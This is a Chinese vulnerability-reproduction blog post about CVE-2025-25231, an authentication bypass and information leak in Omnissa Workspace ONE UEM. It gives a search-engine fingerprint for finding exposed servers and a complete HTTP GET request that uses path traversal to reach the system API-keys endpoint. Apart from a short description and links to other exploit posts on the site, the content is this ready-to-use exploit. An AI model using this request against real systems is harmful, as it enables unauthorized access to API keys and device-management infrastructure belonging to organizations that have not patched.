Omnissa Workspace ONE UEM存在敏感信息泄漏漏洞

0268

 

Omnissa Workspace ONE UEM 是一款集成的平台,通过单一控制台实现所有操作系统(包括桌面、移动、Rugged 设备和IoT)和所有用例的设备、应用程序、安全和身份进行管理。2025年9月,互联网上披露 CVE-2025-25231 Omnissa Workspace ONE UEM 敏感信息泄漏漏洞。恶意攻击者可构造恶意请求绕过相关身份认证,获取敏感信息,调用相关接口。 (CVE-2025-25231)

image

 

 

banner=”/airwatch/default.aspx”|| header=”/airwatch/default.aspx”

 

GET /DevicesGateway/apps/system-app-metadata/1?packageId=../../../../API/system/groups/apikeys%3fogname=Global HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

 

image

 

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞复现
# 漏洞复现
喜欢就支持一下吧
点赞8 分享
admin的头像-吾要学习
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞-吾要学习
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞
11小时前 50
东胜物流软件GetData接口SQL注入漏洞-吾要学习
东胜物流软件GetData接口SQL注入漏洞
东胜物流软件GetData接口SQL注入漏洞
11小时前 48
青龙面板dependencies接口远程代码执行漏洞-吾要学习
青龙面板dependencies接口远程代码执行漏洞
青龙面板dependencies接口远程代码执行漏洞
11小时前 44
安科瑞企业微电网能效管理系统 默认密码漏洞-吾要学习
安科瑞企业微电网能效管理系统 默认密码漏洞
安科瑞企业微电网能效管理系统 默认密码漏洞
10小时前 38
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析-吾要学习
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析
14小时前 34
Chroma DB swagger 敏感信息泄露漏洞-吾要学习
Chroma DB swagger 敏感信息泄露漏洞
Chroma DB swagger 敏感信息泄露漏洞
10小时前 30
相关推荐
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞-吾要学习
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞
11小时前 50
东胜物流软件GetData接口SQL注入漏洞-吾要学习
东胜物流软件GetData接口SQL注入漏洞
东胜物流软件GetData接口SQL注入漏洞
11小时前 48
青龙面板dependencies接口远程代码执行漏洞-吾要学习
青龙面板dependencies接口远程代码执行漏洞
青龙面板dependencies接口远程代码执行漏洞
11小时前 44
安科瑞企业微电网能效管理系统 默认密码漏洞-吾要学习
安科瑞企业微电网能效管理系统 默认密码漏洞
安科瑞企业微电网能效管理系统 默认密码漏洞
10小时前 38
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析-吾要学习
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析
14小时前 34
Chroma DB swagger 敏感信息泄露漏洞-吾要学习
Chroma DB swagger 敏感信息泄露漏洞
Chroma DB swagger 敏感信息泄露漏洞
10小时前 30
评论 抢沙发

请登录后发表评论

    暂无评论内容